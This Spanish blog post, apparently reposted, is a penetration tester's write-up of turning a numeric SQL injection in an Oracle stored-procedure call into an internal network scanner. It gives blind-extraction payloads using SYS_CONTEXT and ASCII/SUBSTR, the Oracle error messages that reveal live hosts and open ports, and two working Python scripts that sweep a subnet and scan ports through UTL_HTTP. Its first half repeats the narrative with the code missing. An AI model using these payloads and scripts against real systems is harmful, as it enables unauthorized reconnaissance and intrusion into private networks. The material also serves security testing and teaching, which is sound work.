Hace poco, haciendo una auditoría web, encontré un parámetro que era vulnerable a SQL injection.
Tras un pequeño análisis, identifiqué que se trataba de un servidor Oracle y que no iba a ser fácil extraer información de la base de datos porque se ve que la inyección debía de estar en la llamada a un procedimiento almacenado.
Algo así como:
Oracle, en esta sintaxis, no permite añadir consultas del tipo SELECT, así que realizar las típicas inyecciones para determinar el usuario de la base de datos, el nombre de ésta, qué tablas las forman... no iba a funcionar.
Tras probar muchas cosas, vi que sí que podía utilizar variables SYS_CONTEXT para recuperar variables del sistema relativas a la configuración ya que, aunque no podía hacer un:
Sí que podía (ojo, era una inyección de tipo numérico):
O, del mismo modo:
Con esto, no tenía acceso a los datos de la base de datos en sí, pero obtuve información principalmente relacionada con el entorno Oracle como usuarios, dirección IP del servidor, tipo de autenticación utilizada...
Ya estaba a punto de desesperarme y decidir que no podía llegar mucho más allá cuando me acordé de los procedimientos almacenados de los que os hablé en la entrada anterior: UTL_HTTP y UTL_INADDR.
Así que pensé: ¿qué pasará si digo de utilizar UTL_HTTP para acceder a otros puertos del servidor para intentar determinar si están o no abiertos? Algo en plan:
Creo que la siguiente pregunta que me hice es evidente... ¿Y si escaneo otros hosts de la red? Pues exactamente igual. En este caso, lo que hice fue siempre preguntar por el puerto 22 y observé las respuestas:
Cuando existía el host en la red, el error que devolvía era alguno de los dos errores asociados a si el puerto estaba o no abierto.
Así que cogí y en un rato me hice mi propio escáner de puertos a través del SQLi que había encontrado. Éste es el resultado que puede servir como prueba de concepto:
Este script se ejecutará directamente:
Este script, recibe la dirección IP a escanear como entrada. Por ejemplo:
Y de este modo conseguí que una vulnerabilidad que no hubiera pasado ni pena ni gloria, se convirtiera en algo interesante. Es más, con más tiempo podría haber intentado acceder a otros de los servicios que encontré abiertos (entre ellos un JBoss en un puerto 8080).
Tras un pequeño análisis, identifiqué que se trataba de un servidor Oracle y que no iba a ser fácil extraer información de la base de datos porque se ve que la inyección debía de estar en la llamada a un procedimiento almacenado.
Algo así como:
procedimiento_almacenado (parámetro_vulnerable);
Oracle, en esta sintaxis, no permite añadir consultas del tipo SELECT, así que realizar las típicas inyecciones para determinar el usuario de la base de datos, el nombre de ésta, qué tablas las forman... no iba a funcionar.
Tras probar muchas cosas, vi que sí que podía utilizar variables SYS_CONTEXT para recuperar variables del sistema relativas a la configuración ya que, aunque no podía hacer un:
SELECT user from DUAL;
Sí que podía (ojo, era una inyección de tipo numérico):
55 - (ASCII (SUBSTR (user,1,1)) - ASCII('U') )
O, del mismo modo:
55 - (ASCII (SUBSTR (SYS_CONTEXT('USERENV', 'CURRENT_USER'), 1, 1)) - ASCII('U') )
Con esto, no tenía acceso a los datos de la base de datos en sí, pero obtuve información principalmente relacionada con el entorno Oracle como usuarios, dirección IP del servidor, tipo de autenticación utilizada...
Ya estaba a punto de desesperarme y decidir que no podía llegar mucho más allá cuando me acordé de los procedimientos almacenados de los que os hablé en la entrada anterior: UTL_HTTP y UTL_INADDR.
Así que pensé: ¿qué pasará si digo de utilizar UTL_HTTP para acceder a otros puertos del servidor para intentar determinar si están o no abiertos? Algo en plan:
- http://10.0.2.51:22
- http://10.0.2.51:80
- http://10.0.2.51:443
- http://10.0.2.51:8080
- http://10.0.2.51:1521
- ...
- Error cuando el puerto estaba abierto:
java.sql.SQLException: ORA-29273: HTTP request failed ORA-06512: at "SYS.UTL_HTTP", line 1722 ORA-29263: HTTP protocol error ORA-06512: at line 1 at [...]
- Error cuando el puerto estaba cerrado:
java.sql.SQLException: ORA-29273: HTTP request failed ORA-06512: at "SYS.UTL_HTTP", line 1722 ORA-12541: TNS:no listener ORA-06512: at line 1 at [...]
Creo que la siguiente pregunta que me hice es evidente... ¿Y si escaneo otros hosts de la red? Pues exactamente igual. En este caso, lo que hice fue siempre preguntar por el puerto 22 y observé las respuestas:
- Cuando no existía el host:
java.sql.SQLException: ORA-29273: HTTP request failed ORA-06512: at "SYS.UTL_HTTP", line 1722 ORA-12543: TNS:destination host unreachable ORA-06512: at line 1 at [...]
Cuando existía el host en la red, el error que devolvía era alguno de los dos errores asociados a si el puerto estaba o no abierto.
Así que cogí y en un rato me hice mi propio escáner de puertos a través del SQLi que había encontrado. Éste es el resultado que puede servir como prueba de concepto:
Escaneo de red:
import requests cookies = { "JSESSIONID" : "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" } headers = { "Content-Type" : "application/x-www-form-urlencoded" } i = 0 for i in range ( 254 ): r = requests.post ( "http://www.example.com/vulnerable_page" , "parametro_vulnerable=55 - (length (utl_http.request('http://10.0.2.%s:22/')) )" % str (i + 1 ), cookies = cookies, headers = headers ) if not "destination host unreachable" in r.text: print "Alive: 10.0.2.%s" % str (i + 1 ) |
Este script se ejecutará directamente:
$ python network_scan.py
Escaneo de puertos:
import requests import sys cookies = { "JSESSIONID" : "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" } headers = { "Content-Type" : "application/x-www-form-urlencoded" } topports = ( 26 , 554 , 32768 , 8000 , 8443 , 2000 , 1026 , 179 , 5060 , 514 , 10000 , 6001 , 81 , 113 , 548 , 465 , 1720 , 199 , 8888 , 587 , 1025 , 5900 , 993 , 995 , 111 , 1723 , 8080 , 3306 , 135 , 53 , 143 , 139 , 445 , 110 , 3389 , 25 , 22 , 21 , 443 , 23 , 80 , 37 , 119 , 9100 , 4899 , 2717 , 1755 , 873 , 1028 , 49157 , 5051 , 6646 , 9 , 1029 , 13 , 1900 , 3986 , 5432 , 3000 , 5190 , 7070 , 5009 , 9999 , 444 , 3128 , 8009 , 389 , 7 , 144 , 5101 , 544 , 543 , 49156 , 427 , 5357 , 990 , 513 , 6000 , 49155 , 1110 , 2121 , 106 , 5800 , 79 , 88 , 2049 , 8081 , 49153 , 631 , 5631 , 5000 , 646 , 5666 , 1027 , 49154 , 8008 , 515 , 2001 , 49152 , 1433 ) i = 0 for i in topports: r = requests.post ( "http://www.example.com/vulnerable_page" , "parametro_vulnerable=55 - (length (utl_http.request('http://%s:%s/')) )" % ( sys.argv[ 1 ], str (i)), cookies = cookies, headers = headers ) if not "no listener" in r.text: print "Open port: %s" % str (i) |
Este script, recibe la dirección IP a escanear como entrada. Por ejemplo:
$ python port_scan.py 10.0.2.51
Y de este modo conseguí que una vulnerabilidad que no hubiera pasado ni pena ni gloria, se convirtiera en algo interesante. Es más, con más tiempo podría haber intentado acceder a otros de los servicios que encontré abiertos (entre ellos un JBoss en un puerto 8080).
Fuente: http://laxmarcaellugar.blogspot.com/2014/03/de-una-inyeccion-sql-un-escaner-de-red.html
No hay comentarios:
Publicar un comentario